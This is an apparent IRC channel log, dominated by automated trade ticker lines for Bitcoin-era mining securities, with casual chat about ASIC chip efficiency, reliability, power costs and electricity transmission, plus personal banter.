21:19:53 [BTCTC] [LABCOIN] 3000 @ 0.002979 = 8.937 BTC [+] Sep 15 21:20:28 I'm more concerned about LC jumping the "selling 130nm miners" ship to we are now focusing on 55/65 they stated Sep 15 21:20:46 [BTCTC] [LABCOIN] 400 @ 0.00298 = 1.192 BTC [+] Sep 15 21:21:02 [BTCTC] [LABCOIN] 5812 @ 0.00298 = 17.3198 BTC [+] Sep 15 21:21:14 [BTCTC] [S.MPOE-PT] 1 @ 0.0007811 BTC [-] Sep 15 21:21:26 [BTCTC] [LABCOIN] 19 @ 0.002981 = 0.0566 BTC [+] Sep 15 21:21:38 [MPEX] [S.MPOE] 7165 @ 0.00088562 = 6.3455 BTC [-] Sep 15 21:21:40 [MPEX] [S.MPOE] 3135 @ 0.00088121 = 2.7626 BTC [-] Sep 15 21:21:41 [BTCTC] [LTC-ATF.B2] 2 @ 0.01089 = 0.0218 BTC [+] Sep 15 21:21:41 130 wouldn't be competitive by the time they could get them out the door, probably not even competitive already Sep 15 21:21:43 [BTCTC] [LABCOIN] 16 @ 0.002914 = 0.0466 BTC [-] Sep 15 21:21:45 [BTCTC] [LABCOIN] 181 @ 0.002981 = 0.5396 BTC [+] Sep 15 21:21:46 [BTCTC] [LABCOIN] 100 @ 0.002988 = 0.2988 BTC [+] Sep 15 21:21:46 [BTCTC] [LABCOIN] 400 @ 0.002999 = 1.1996 BTC [+] Sep 15 21:21:48 i'm not concerned about that one Sep 15 21:21:51 They aren't Sep 15 21:22:04 But everyone knew that before IPO Sep 15 21:22:06 [BTCTC] [LABCOIN] 100 @ 0.003 = 0.3 BTC [+] Sep 15 21:22:07 [BTCTC] [LABCOIN] 350 @ 0.003 = 1.05 BTC [+] Sep 15 21:22:07 [BTCTC] [LABCOIN] 3 @ 0.003 = 0.009 BTC [+] Sep 15 21:22:07 [BTCTC] [LABCOIN] 1708 @ 0.003 = 5.124 BTC [+] Sep 15 21:22:07 [BTCTC] [LABCOIN] 270 @ 0.003 = 0.81 BTC [+] Sep 15 21:22:07 [BTCTC] [LABCOIN] 300 @ 0.003 = 0.9 BTC [+] Sep 15 21:22:07 [BTCTC] [LABCOIN] 10 @ 0.003 = 0.03 BTC [+] Sep 15 21:22:08 [BTCTC] [LABCOIN] 100 @ 0.003 = 0.3 BTC [+] Sep 15 21:22:09 [BTCTC] [LABCOIN] 20 @ 0.003 = 0.06 BTC [+] Sep 15 21:22:10 [BTCTC] [LABCOIN] 1357 @ 0.003007 = 4.0805 BTC [+] Sep 15 21:22:10 [BTCTC] [LABCOIN] 150 @ 0.00304 = 0.456 BTC [+] Sep 15 21:22:11 [BTCTC] [LABCOIN] 110 @ 0.00304 = 0.3344 BTC [+] Sep 15 21:22:27 depends. i think there is a wide range between "not profitable" and "profitable", especially you can't pin this down to transistor size Sep 15 21:22:34 [BTCTC] [DMS.PURCHASE] 7 @ 0.0093 = 0.0651 BTC [-] Sep 15 21:22:37 [BTCTC] [LABCOIN] 1000 @ 0.003048 = 3.048 BTC [+] Sep 15 21:22:53 a wide range between profitable and not profitable ? Sep 15 21:23:00 lol Sep 15 21:23:02 k Sep 15 21:23:03 what is this, obamanomics ? Sep 15 21:23:11 lmao Sep 15 21:23:13 [BTCTC] [LABCOIN] 800 @ 0.00309 = 2.472 BTC [+] Sep 15 21:23:29 [BTCTC] [NASTY-PT] 2 @ 0.001856 = 0.0037 BTC [+] Sep 15 21:23:44 [BTCTC] [LABCOIN] 140 @ 0.00309 = 0.4326 BTC [+] Sep 15 21:23:47 [BTCTC] [LABCOIN] 450 @ 0.00309 = 1.3905 BTC [+] Sep 15 21:23:50 [BTCTC] [LABCOIN] 320 @ 0.00309 = 0.9888 BTC [+] Sep 15 21:23:54 i just wanted to say: there are more factors to consider instead of only the transistor size Sep 15 21:24:07 that for sure. Sep 15 21:24:10 [BTCTC] [LABCOIN] 2000 @ 0.00308 = 6.16 BTC [-] Sep 15 21:24:15 people focus on process nm because it's much easier. Sep 15 21:24:25 [BTCTC] [LABCOIN] 240 @ 0.00309 = 0.7416 BTC [+] Sep 15 21:24:29 the quality of the design is probably a degree of magnitude more important for performance Sep 15 21:25:01 which factor is more related to power consumption? Sep 15 21:25:05 I hope the design quality outshines the picture quality they like to post Sep 15 21:25:06 [BTCTC] [TAT.VIRTUALMINE] 8 @ 0.0006 = 0.0048 BTC [-] Sep 15 21:25:16 yes, and production and maintenance cost Sep 15 21:25:29 well, power consumption is one Sep 15 21:25:41 [BTCTC] [ASICMINER-PT] 1 @ 2.025 BTC [+] Sep 15 21:25:42 probably the most important one Sep 15 21:25:42 [BTCTC] [ASICMINER-PT] 2 @ 2.024 = 4.048 BTC [-] Sep 15 21:25:43 [BTCTC] [ASICMINER-PT] 1 @ 2.023 BTC [-] Sep 15 21:25:44 [BTCTC] [ASICMINER-PT] 5 @ 2.022 = 10.11 BTC [-] Sep 15 21:25:45 [BTCTC] [ASICMINER-PT] 1 @ 2.02 BTC [-] Sep 15 21:26:01 the most important one is reliability, really. Sep 15 21:26:05 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.0006 BTC [-] Sep 15 21:26:21 power efficiency (ie, consumption per cycle) correlates strongly with the process size, Sep 15 21:26:34 and on time shipping.. hehe Sep 15 21:26:34 [BTCTC] [LABCOIN] 520 @ 0.00309 = 1.6068 BTC [+] Sep 15 21:26:36 however overall efficiency also includes hash output / cycle. which... you know, depends. Sep 15 21:26:43 [BTCTC] [LABCOIN] 1450 @ 0.00309 = 4.4805 BTC [+] Sep 15 21:26:47 [BTCTC] [LABCOIN] 100 @ 0.003048 = 0.3048 BTC [-] Sep 15 21:27:01 [BTCTC] [BASIC-MINING] 1 @ 0.1182 BTC [-] Sep 15 21:27:02 [BTCTC] [BASIC-MINING] 2 @ 0.1181 = 0.2362 BTC [-] Sep 15 21:27:15 here's a set of fun facts : in a 16 core chip which has 14 blown cores it is likely the blown cores are powered anyway. Sep 15 21:27:17 [BTCTC] [LABCOIN] 100 @ 0.003048 = 0.3048 BTC [-] Sep 15 21:27:24 which means it uses 7 times as much power as it actually needs. Sep 15 21:27:34 now, it's much more likely to have blown cores in tight process. Sep 15 21:27:58 i wish i would know more about this stuff Sep 15 21:28:12 [BTCTC] [LABCOIN] 5000 @ 0.003 = 15 BTC [-] Sep 15 21:28:13 [BTCTC] [LABCOIN] 1080 @ 0.00309 = 3.3372 BTC [+] Sep 15 21:28:14 [BTCTC] [LABCOIN] 200 @ 0.00309 = 0.618 BTC [+] Sep 15 21:28:16 [BTCTC] [LABCOIN] 420 @ 0.0031 = 1.302 BTC [+] Sep 15 21:28:41 so your gen II process is in theory 3x as efficient in power as gen I, but if you get 99% reliability on gen I and 35% on gen II well... gen I is still more bang per watt. Sep 15 21:29:53 At what point is it in the developers best interest to "skip" the chip due to failure? And what does it mean for the consumer? Sep 15 21:30:03 [BTCTC] [DMS.MINING] 1 @ 0.002445 BTC [-] Sep 15 21:30:08 yup, but that's not all also. it's obviously a huge difference if you deploy your rigs in.. say a chinese datacentre with almost no power cost instead of running a miner somewhere in europa in your living room Sep 15 21:31:00 MilkyLep it'd depend tho. see the thing is, unreliable chips are unknowns. Sep 15 21:31:06 a core doesn' hold up a flag saying "busted" Sep 15 21:31:15 it might even run for seconds or minutes or weeks. Sep 15 21:31:25 which is the rationale of the entire "burn-in" thing Sep 15 21:31:39 power up the board for a time, see how much of it burns Sep 15 21:32:03 dexX7 it's a false idea that chinese dc has no power cost. Sep 15 21:32:23 if that were true the chinese govt would just export all the electricity and increase the production, exponentially, until balance were met. Sep 15 21:32:39 [BTCTC] [LABCOIN] 12 @ 0.0031 = 0.0372 BTC [+] Sep 15 21:32:45 in fact commercial power costs by and large the same all over the world. Sep 15 21:33:31 yeah well, i guess that's the prejudice/false impression i have there Sep 15 21:35:02 [LABCOIN] 12 @ 0.0031 = 0.0372 BTC [+] << that poor guy.. Sep 15 21:35:08 i mean, sure some states subsidize domestic power consumption, Sep 15 21:35:11 oh nvm Sep 15 21:35:16 but that's really besides the point. mooching isnt a business plan. Sep 15 21:35:37 there a lot of options out there with a shifted digit Sep 15 21:36:05 you wonder who'd take such. Sep 15 21:36:30 i only saw it one time with like.. 30 btc blown in the wind Sep 15 21:37:28 [BTCTC] [ASICMINER-PT] 1 @ 2.021 BTC [+] Sep 15 21:37:29 [BTCTC] [ASICMINER-PT] 2 @ 2.02 = 4.04 BTC [-] Sep 15 21:37:31 [BTCTC] [ASICMINER-PT] 3 @ 2.018 = 6.054 BTC [-] Sep 15 21:37:32 [BTCTC] [ASICMINER-PT] 2 @ 2.017 = 4.034 BTC [-] Sep 15 21:37:32 [BTCTC] [ASICMINER-PT] 3 @ 2.016 = 6.048 BTC [-] Sep 15 21:38:25 [BTCTC] [LABCOIN] 87 @ 0.0031 = 0.2697 BTC [+] Sep 15 21:38:27 [BTCTC] [LABCOIN] 100 @ 0.0031 = 0.31 BTC [+] Sep 15 21:38:28 [BTCTC] [LABCOIN] 100 @ 0.0031 = 0.31 BTC [+] Sep 15 21:38:29 [BTCTC] [LABCOIN] 500 @ 0.003134 = 1.567 BTC [+] Sep 15 21:38:30 [BTCTC] [LABCOIN] 507 @ 0.00314 = 1.592 BTC [+] Sep 15 21:38:31 [BTCTC] [LABCOIN] 300 @ 0.00314 = 0.942 BTC [+] Sep 15 21:38:33 [BTCTC] [LABCOIN] 280 @ 0.003149 = 0.8817 BTC [+] Sep 15 21:38:34 [BTCTC] [LABCOIN] 300 @ 0.00316 = 0.948 BTC [+] Sep 15 21:38:35 [BTCTC] [LABCOIN] 2000 @ 0.003162 = 6.324 BTC [+] Sep 15 21:38:36 [BTCTC] [LABCOIN] 100 @ 0.003185 = 0.3185 BTC [+] Sep 15 21:38:36 [BTCTC] [LABCOIN] 100 @ 0.003193 = 0.3193 BTC [+] Sep 15 21:38:37 [BTCTC] [LABCOIN] 500 @ 0.003196 = 1.598 BTC [+] Sep 15 21:38:38 [BTCTC] [LABCOIN] 1000 @ 0.003197 = 3.197 BTC [+] Sep 15 21:38:39 [BTCTC] [LABCOIN] 1026 @ 0.003198 = 3.2811 BTC [+] Sep 15 21:39:27 good morning! Sep 15 21:39:51 [BTCTC] [LABCOIN] 79 @ 0.003198 = 0.2526 BTC [+] Sep 15 21:40:08 [BTCTC] [LABCOIN] 1 @ 0.00315 BTC [-] Sep 15 21:40:39 [HAVELOCK] [DEALCO] 25 @ 0.0085 = 0.2125 BTC [+] Sep 15 21:41:03 [HAVELOCK] [DEALCO] 5 @ 0.0085 = 0.0425 BTC [+] Sep 15 21:43:07 [BTCTC] [LABCOIN] 26 @ 0.00315 = 0.0819 BTC [-] Sep 15 21:43:07 [BTCTC] [LABCOIN] 71 @ 0.00315 = 0.2237 BTC [-] Sep 15 21:44:28 [BTCTC] [LABCOIN] 1150 @ 0.003196 = 3.6754 BTC [+] Sep 15 21:44:42 heya. Sep 15 21:48:34 you can't export power Sep 15 21:48:41 [HAVELOCK] [CBTC] 100 @ 0.000398 = 0.0398 BTC [+] Sep 15 21:48:46 [HAVELOCK] [CBTC] 828 @ 0.00039899 = 0.3304 BTC [+] Sep 15 21:48:49 except via a storage medium, à la oil Sep 15 21:48:49 [HAVELOCK] [CBTC] 5072 @ 0.0003999 = 2.0283 BTC [+] Sep 15 21:48:56 [BTCTC] [DMS.MINING] 1 @ 0.002406 BTC [-] Sep 15 21:49:00 of course you can Sep 15 21:49:06 efficiencies just won't be great Sep 15 21:49:13 [BTCTC] [ASICMINER-PT] 6 @ 2.016 = 12.096 BTC [-] Sep 15 21:49:14 [BTCTC] [ASICMINER-PT] 10 @ 2.015 = 20.15 BTC [-] Sep 15 21:49:16 [BTCTC] [ASICMINER-PT] 4 @ 2.015 = 8.06 BTC [-] Sep 15 21:49:24 [HAVELOCK] [CBTC] 428 @ 0.0003999 = 0.1712 BTC [+] Sep 15 21:49:36 ;;google Sep 15 21:49:36 (google [--{filter,language} ]) -- Searches google.com for the given string. As many results as can fit are included. --language accepts a language abbreviation; --filter accepts a filtering level ('active', 'moderate', 'off'). Sep 15 21:49:39 ;;google rectenna Sep 15 21:49:40 Rectenna - Wikipedia, the free encyclopedia: ; Rectenna Converts Radio Waves To Electricity #DigInfo - YouTube: ; Infrared rectennas | CoolCAD Electronics: Sep 15 21:49:47 [BTCTC] [LABCOIN] 30 @ 0.0031 = 0.093 BTC [-] Sep 15 21:50:28 [BTCTC] [DMS.MINING] 23 @ 0.002405 = 0.0553 BTC [-] Sep 15 21:50:31 [BTCTC] [DMS.MINING] 70 @ 0.002405 = 0.1684 BTC [-] Sep 15 21:51:00 benkay: ohm's law, baby. Resistance is a bitch. Sep 15 21:51:09 reeses romania has been exporting about 1/10 of its output since early 2000 Sep 15 21:51:19 but it doesn't go far Sep 15 21:51:25 it just happens that electricity is fungible Sep 15 21:51:27 [BTCTC] [DMS.PURCHASE] 18 @ 0.009377 = 0.1688 BTC [+] Sep 15 21:51:32 it does, because it shifts see ? Sep 15 21:51:33 so it goes maybe a few hundred km Sep 15 21:51:40 [BTCTC] [CIPHERMINE.B1] 1 @ 0.01028 BTC [-] Sep 15 21:51:47 then the generation at that point is instead exported from that market Sep 15 21:51:49 and so on Sep 15 21:51:53 if you have 100 generators 10 km apart each, you can actually move 1000km instantaneously Sep 15 21:52:07 if one generator at one end has overcapacity and the one at other end undercapacity Sep 15 21:52:10 right Sep 15 21:52:12 exactly. Sep 15 21:52:14 see above Sep 15 21:52:15 so in the end, same thing. Sep 15 21:52:19 [BTCTC] [DMS.MINING] 15 @ 0.002406 = 0.0361 BTC [+] Sep 15 21:52:19 learn to touch type Sep 15 21:52:21 ;> Sep 15 21:52:25 fu :D Sep 15 21:52:49 [HAVELOCK] [CBTC] 12949 @ 0.0004097 = 5.3052 BTC [+] Sep 15 21:52:53 [HAVELOCK] [CBTC] 1051 @ 0.0004098 = 0.4307 BTC [+] Sep 15 21:53:11 [BTCTC] [DMS.MINING] 383 @ 0.002445 = 0.9364 BTC [+] Sep 15 21:53:46 [BTCTC] [DMS.MINING] 460 @ 0.002445 = 1.1247 BTC [+] Sep 15 21:54:18 but if some idjit, who is obviously not one of us ;>, were to try to string a skinny wire from china to paris, and run DC over it, they would not have a great success for the people Sep 15 21:54:23 [HAVELOCK] [CBTC] 3525 @ 0.0004098 = 1.4445 BTC [+] Sep 15 21:54:29 [BTCTC] [CIPHERMINE.B1] 17 @ 0.01027 = 0.1746 BTC [-] Sep 15 21:54:32 [BTCTC] [DMS.MINING] 127 @ 0.002445 = 0.3105 BTC [+] Sep 15 21:55:30 speaking of electronics, my 11 year old nephew shames me Sep 15 21:55:48 I bought him one of the big arduino kits for his bday in July Sep 15 21:55:49 [BTCTC] [RSM] 1 @ 0.00862 BTC [-] Sep 15 21:55:49 aren't you kinda young for 11 yo nephews ? Sep 15 21:55:51 saw him last week Sep 15 21:55:54 [HAVELOCK] [CBTC] 924 @ 0.0004098 = 0.3787 BTC [+] Sep 15 21:56:03 and he started asking questions Sep 15 21:56:16 [BTCTC] [RSM] 1 @ 0.008619 BTC [-] Sep 15 21:56:23 turns out he thought the arduino itself was boring and used the components Sep 15 21:56:48 and was asking questions about analog circuits and banks of leds and capacitance Sep 15 21:56:53 lol Sep 15 21:56:55 and I'm thinking,"I hate this kid" Sep 15 21:56:55 nice Sep 15 21:56:56 [BTCTC] [RSM] 1 @ 0.00862 BTC [+] Sep 15 21:56:56 [BTCTC] [RSM] 7 @ 0.008654 = 0.0606 BTC [+] Sep 15 21:57:07 you gotta learn to be a manager :D Sep 15 21:57:24 I played socrates Sep 15 21:57:28 [BTCTC] [DMS.PURCHASE] 4 @ 0.009377 = 0.0375 BTC [+] Sep 15 21:57:30 next best. Sep 15 21:57:35 reeses are you in eve btw ? Sep 15 21:57:40 the game? Sep 15 21:57:40 [MPEX] [S.MPOE] 1477 @ 0.00088577 = 1.3083 BTC [+] Sep 15 21:57:41 [MPEX] [S.MPOE] 4450 @ 0.00088662 = 3.9455 BTC [+] Sep 15 21:57:42 [BTCTC] [TAT.ASICMINER] 1 @ 0.01999 BTC [-] Sep 15 21:57:42 yes Sep 15 21:57:43 [MPEX] [S.MPOE] 6973 @ 0.00088706 = 6.1855 BTC [+] Sep 15 21:57:46 I don't play games Sep 15 21:57:53 I do play letterpress on the phone when bored Sep 15 21:57:55 lies. Sep 15 21:58:02 [BTCTC] [RSM] 10 @ 0.008654 = 0.0865 BTC [+] Sep 15 21:58:08 games == get compilers to stop telling me my code is bad Sep 15 21:58:20 Ha Sep 15 21:58:25 [BTCTC] [RSM] 7 @ 0.008654 = 0.0606 BTC [+] Sep 15 21:58:27 well, that same kid and I play chess Sep 15 21:58:28 more like puzzle Sep 15 21:58:49 I can beat him at normal chess because I have the memory Sep 15 21:58:55 but he kicks my ass at chess 960 Sep 15 21:59:01 it's humiliating Sep 15 21:59:06 "top lies men will tell to your face : 1. I don't play games ; 2. I don't jack off ; 3. I don't drink, smoke or do dope ; 4. I'm not gay" Sep 15 21:59:15 i read it in some mag, it must be true. Sep 15 21:59:32 [BTCTC] [DMS.PURCHASE] 23 @ 0.009377 = 0.2157 BTC [+] Sep 15 21:59:38 I rub it out to naked men when I'm drunk, but I don't play games, smoke, or do dope Sep 15 22:00:04 cosmo wins again Sep 15 22:00:47 no it was some cheap local knockoff Sep 15 22:00:59 Maria Louisa or some bs. Sep 15 22:02:23 [BTCTC] [ASICMINER-PT] 2 @ 2.016 = 4.032 BTC [+] Sep 15 22:02:24 [BTCTC] [ASICMINER-PT] 1 @ 2.015 BTC [-] Sep 15 22:02:26 [BTCTC] [ASICMINER-PT] 10 @ 2.014 = 20.14 BTC [-] Sep 15 22:02:45 .d Sep 15 22:02:46 112628548.66635 | Next Diff in 1878 blocks | Estimated Change: 18.4651% in 10d 15h 16m 8s Sep 15 22:02:51 [BTCTC] [DMS.MINING] 10 @ 0.002445 = 0.0245 BTC [+] Sep 15 22:09:09 [BTCTC] [ASICMINER-PT] 2 @ 2.015 = 4.03 BTC [+] Sep 15 22:09:09 [BTCTC] [ASICMINER-PT] 3 @ 2.014 = 6.042 BTC [-] Sep 15 22:09:10 [BTCTC] [ASICMINER-PT] 1 @ 2.013 BTC [-] Sep 15 22:09:12 [BTCTC] [ASICMINER-PT] 16 @ 2.013 = 32.208 BTC [-] Sep 15 22:14:00 [BTCTC] [TAT.VIRTUALMINE] 5 @ 0.00061 = 0.0031 BTC [+] Sep 15 22:14:15 [BTCTC] [DMS.MINING] 100 @ 0.00242 = 0.242 BTC [-] Sep 15 22:14:44 [BTCTC] [TAT.ASICMINER] 10 @ 0.01997 = 0.1997 BTC [-] Sep 15 22:14:46 [BTCTC] [TAT.ASICMINER] 10 @ 0.01998 = 0.1998 BTC [+] Sep 15 22:15:21 [BTCTC] [DMS.MINING] 40 @ 0.00243 = 0.0972 BTC [+] Sep 15 22:16:07 [BTCTC] [DMS.SELLING] 17 @ 0.007 = 0.119 BTC [-] Sep 15 22:16:08 [BTCTC] [DMS.SELLING] 30 @ 0.007046 = 0.2114 BTC [+] Sep 15 22:16:09 [BTCTC] [DMS.SELLING] 1 @ 0.007047 BTC [+] Sep 15 22:16:35 [BTCTC] [LABCOIN] 32 @ 0.002871 = 0.0919 BTC [-] Sep 15 22:16:35 [BTCTC] [LABCOIN] 320 @ 0.00287 = 0.9184 BTC [-] Sep 15 22:16:37 [BTCTC] [LABCOIN] 1 @ 0.002865 BTC [-] Sep 15 22:16:38 [BTCTC] [LABCOIN] 16 @ 0.002864 = 0.0458 BTC [-] Sep 15 22:16:39 [BTCTC] [LABCOIN] 131 @ 0.002852 = 0.3736 BTC [-] Sep 15 22:17:21 [HAVELOCK] [XBOND] 100 @ 0.00118999 = 0.119 BTC [-] Sep 15 22:22:17 [BTCTC] [LABCOIN] 50 @ 0.002842 = 0.1421 BTC [-] Sep 15 22:24:04 [BTCTC] [ACTIVEMINING] 48 @ 0.002614 = 0.1255 BTC [-] Sep 15 22:24:18 [BTCTC] [ACTIVEMINING] 2 @ 0.002613 = 0.0052 BTC [-] Sep 15 22:26:04 [BTCTC] [COGNITIVE] 1 @ 0.1715 BTC [-] Sep 15 22:27:28 [BTCTC] [BASIC-MINING] 1 @ 0.118 BTC [-] Sep 15 22:27:53 [HAVELOCK] [AM1] 1 @ 2.017625 BTC [-] Sep 15 22:27:57 [HAVELOCK] [AM1] 2 @ 2.011 = 4.022 BTC [-] Sep 15 22:28:01 [HAVELOCK] [AM1] 1 @ 2.0101 BTC [-] Sep 15 22:28:02 [BTCTC] [DMS.MINING] 50 @ 0.00243 = 0.1215 BTC [+] Sep 15 22:28:05 [HAVELOCK] [AM1] 4 @ 2.01001 = 8.04 BTC [-] Sep 15 22:28:09 [HAVELOCK] [AM1] 2 @ 2.0004 = 4.0008 BTC [-] Sep 15 22:28:29 [BTCTC] [CRYPTO-TRADE] 1 @ 0.1969 BTC [-] Sep 15 22:28:39 [BTCTC] [DMS.MINING] 3 @ 0.002406 = 0.0072 BTC [-] Sep 15 22:28:41 [BTCTC] [DMS.MINING] 2 @ 0.002406 = 0.0048 BTC [-] Sep 15 22:29:45 [BTCTC] [DMS.MINING] 8 @ 0.002429 = 0.0194 BTC [+] Sep 15 22:30:21 [BTCTC] [BTC-TRADING-PT] 1 @ 0.9401 BTC [-] Sep 15 22:30:22 [BTCTC] [DMS.MINING] 8 @ 0.002405 = 0.0192 BTC [-] Sep 15 22:30:44 [BTCTC] [DMS.PURCHASE] 25 @ 0.009377 = 0.2344 BTC [+] Sep 15 22:30:51 [HAVELOCK] [SMG] 1586 @ 0.0002148 = 0.3407 BTC [+] Sep 15 22:30:55 [HAVELOCK] [SMG] 1586 @ 0.0002148 = 0.3407 BTC [+] Sep 15 22:30:58 [BTCTC] [DMS.MINING] 7 @ 0.002429 = 0.017 BTC [+] Sep 15 22:30:59 [HAVELOCK] [SMG] 100 @ 0.00021497 = 0.0215 BTC [+] Sep 15 22:31:01 [BTCTC] [LABCOIN] 579 @ 0.002804 = 1.6235 BTC [-] Sep 15 22:31:03 [HAVELOCK] [SMG] 123 @ 0.00021498 = 0.0264 BTC [+] Sep 15 22:31:07 [HAVELOCK] [SMG] 30 @ 0.000216 = 0.0065 BTC [+] Sep 15 22:32:30 [BTCTC] [DMS.PURCHASE] 2 @ 0.009377 = 0.0188 BTC [+] Sep 15 22:33:24 [BTCTC] [TAT.ASICMINER] 10 @ 0.0197 = 0.197 BTC [-] Sep 15 22:33:26 [BTCTC] [TAT.ASICMINER] 4 @ 0.01961 = 0.0784 BTC [-] Sep 15 22:33:27 [BTCTC] [TAT.ASICMINER] 50 @ 0.0196 = 0.98 BTC [-] Sep 15 22:33:28 [BTCTC] [TAT.ASICMINER] 1 @ 0.01936 BTC [-] Sep 15 22:33:29 [BTCTC] [TAT.ASICMINER] 35 @ 0.01936 = 0.6776 BTC [-] Sep 15 22:33:30 [BTCTC] [TAT.ASICMINER] 5 @ 0.01935 = 0.0968 BTC [-] Sep 15 22:33:31 [BTCTC] [TAT.ASICMINER] 5 @ 0.01933 = 0.0967 BTC [-] Sep 15 22:33:32 [BTCTC] [TAT.ASICMINER] 21 @ 0.01932 = 0.4057 BTC [-] Sep 15 22:33:33 [BTCTC] [TAT.ASICMINER] 10 @ 0.01932 = 0.1932 BTC [-] Sep 15 22:33:34 [BTCTC] [TAT.ASICMINER] 1 @ 0.01932 BTC [-] Sep 15 22:33:35 [BTCTC] [TAT.ASICMINER] 5 @ 0.01931 = 0.0966 BTC [-] Sep 15 22:33:36 [BTCTC] [TAT.ASICMINER] 4 @ 0.0193 = 0.0772 BTC [-] Sep 15 22:33:37 [BTCTC] [TAT.ASICMINER] 3 @ 0.01917 = 0.0575 BTC [-] Sep 15 22:33:38 [BTCTC] [TAT.ASICMINER] 12 @ 0.01916 = 0.2299 BTC [-] Sep 15 22:33:40 [BTCTC] [TAT.ASICMINER] 3 @ 0.01915 = 0.0575 BTC [-] Sep 15 22:33:40 [BTCTC] [TAT.ASICMINER] 12 @ 0.01914 = 0.2297 BTC [-] Sep 15 22:33:41 [BTCTC] [TAT.ASICMINER] 60 @ 0.01913 = 1.1478 BTC [-] Sep 15 22:33:42 [BTCTC] [TAT.ASICMINER] 2 @ 0.01909 = 0.0382 BTC [-] Sep 15 22:33:43 [BTCTC] [TAT.ASICMINER] 5 @ 0.01908 = 0.0954 BTC [-] Sep 15 22:33:44 [BTCTC] [TAT.ASICMINER] 5 @ 0.01908 = 0.0954 BTC [-] Sep 15 22:33:45 [BTCTC] [TAT.ASICMINER] 1 @ 0.01907 BTC [-] Sep 15 22:33:46 [BTCTC] [TAT.ASICMINER] 5 @ 0.01906 = 0.0953 BTC [-] Sep 15 22:33:47 [BTCTC] [LABCOIN] 513 @ 0.002778 = 1.4251 BTC [-] Sep 15 22:33:48 [BTCTC] [TAT.ASICMINER] 1 @ 0.01904 BTC [-] Sep 15 22:33:49 [BTCTC] [TAT.ASICMINER] 53 @ 0.01902 = 1.0081 BTC [-] Sep 15 22:33:50 [BTCTC] [TAT.ASICMINER] 25 @ 0.01901 = 0.4753 BTC [-] Sep 15 22:33:50 [BTCTC] [TAT.ASICMINER] 1 @ 0.019 BTC [-] Sep 15 22:33:51 [BTCTC] [TAT.ASICMINER] 20 @ 0.019 = 0.38 BTC [-] Sep 15 22:33:53 [BTCTC] [TAT.ASICMINER] 1 @ 0.019 BTC [-] Sep 15 22:33:54 [BTCTC] [TAT.ASICMINER] 6 @ 0.019 = 0.114 BTC [-] Sep 15 22:33:55 [BTCTC] [TAT.ASICMINER] 1 @ 0.019 BTC [-] Sep 15 22:33:56 [BTCTC] [TAT.ASICMINER] 2 @ 0.019 = 0.038 BTC [-] Sep 15 22:33:57 [BTCTC] [TAT.ASICMINER] 20 @ 0.019 = 0.38 BTC [-] Sep 15 22:33:58 [BTCTC] [TAT.ASICMINER] 20 @ 0.01995 = 0.399 BTC [+] Sep 15 22:34:00 [BTCTC] [BASIC-MINING] 1 @ 0.1224 BTC [+] Sep 15 22:34:21 [BTCTC] [TAT.ASICMINER] 10 @ 0.01995 = 0.1995 BTC [+] Sep 15 22:34:24 [BTCTC] [LABCOIN] 200 @ 0.002778 = 0.5556 BTC [-] Sep 15 22:34:34 [BTCTC] [LABCOIN] 200 @ 0.002778 = 0.5556 BTC [-] Sep 15 22:34:45 [BTCTC] [LABCOIN] 200 @ 0.002778 = 0.5556 BTC [-] Sep 15 22:34:47 [BTCTC] [LABCOIN] 120 @ 0.002776 = 0.3331 BTC [-] Sep 15 22:35:23 [BTCTC] [LABCOIN] 334 @ 0.002776 = 0.9272 BTC [-] Sep 15 22:35:25 [BTCTC] [LABCOIN] 98 @ 0.002774 = 0.2719 BTC [-] Sep 15 22:35:26 [BTCTC] [LABCOIN] 96 @ 0.002752 = 0.2642 BTC [-] Sep 15 22:35:27 [BTCTC] [LABCOIN] 800 @ 0.00275 = 2.2 BTC [-] Sep 15 22:36:52 [BTCTC] [LABCOIN] 33 @ 0.002749 = 0.0907 BTC [-] Sep 15 22:37:38 [HAVELOCK] [XBOND] 1 @ 0.00118999 BTC [-] Sep 15 22:37:48 [BTCTC] [LABCOIN] 110 @ 0.002776 = 0.3054 BTC [+] Sep 15 22:38:50 [HAVELOCK] [SMG] 1589 @ 0.0002159 = 0.3431 BTC [-] Sep 15 22:38:53 [HAVELOCK] [SMG] 11 @ 0.000216 = 0.0024 BTC [+] Sep 15 22:39:02 [BTCTC] [TAT.MINIGAME] 1600 @ 0.0002228 = 0.3565 BTC [-] Sep 15 22:40:20 [BTCTC] [TAT.ASICMINER] 4 @ 0.01986 = 0.0794 BTC [-] Sep 15 22:40:21 [BTCTC] [ASICMINER-PT] 1 @ 2.06 BTC [+] Sep 15 22:42:23 [MPEX] [S.MPOE] 3627 @ 0.00088706 = 3.2174 BTC [+] Sep 15 22:42:25 [MPEX] [S.MPOE] 1850 @ 0.00088831 = 1.6434 BTC [+] Sep 15 22:42:42 [MPEX] [S.MPOE] 2121 @ 0.00088839 = 1.8843 BTC [+] Sep 15 22:42:47 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.00056 BTC [-] Sep 15 22:42:48 [BTCTC] [TAT.VIRTUALMINE] 100 @ 0.00055 = 0.055 BTC [-] Sep 15 22:42:50 [BTCTC] [TAT.VIRTUALMINE] 252 @ 0.000545 = 0.1373 BTC [-] Sep 15 22:44:55 [BTCTC] [LABCOIN] 10 @ 0.002776 = 0.0278 BTC [+] Sep 15 22:45:40 [BTCTC] [ASICMINER-PT] 2 @ 2.06 = 4.12 BTC [+] Sep 15 22:45:41 [BTCTC] [ASICMINER-PT] 1 @ 2.014 BTC [-] Sep 15 22:45:42 [BTCTC] [ASICMINER-PT] 2 @ 2.013 = 4.026 BTC [-] Sep 15 22:45:54 [BTCTC] [LABCOIN] 100 @ 0.002707 = 0.2707 BTC [-] Sep 15 22:45:56 [BTCTC] [LABCOIN] 97 @ 0.002707 = 0.2626 BTC [-] Sep 15 22:45:57 [BTCTC] [LABCOIN] 100 @ 0.002706 = 0.2706 BTC [-] Sep 15 22:45:58 [BTCTC] [LABCOIN] 99 @ 0.002686 = 0.2659 BTC [-] Sep 15 22:45:59 [BTCTC] [LABCOIN] 350 @ 0.00267 = 0.9345 BTC [-] Sep 15 22:46:07 [BTCTC] [LABCOIN] 9 @ 0.002665 = 0.024 BTC [-] Sep 15 22:46:07 [BTCTC] [LABCOIN] 3 @ 0.002664 = 0.008 BTC [-] Sep 15 22:46:59 [BTCTC] [ASICMINER-PT] 1 @ 2.013 BTC [-] Sep 15 22:47:01 [BTCTC] [ASICMINER-PT] 2 @ 2.012 = 4.024 BTC [-] Sep 15 22:47:12 [BTCTC] [BTC-BOND] 12154 @ 0.01 = 121.54 BTC [+] Sep 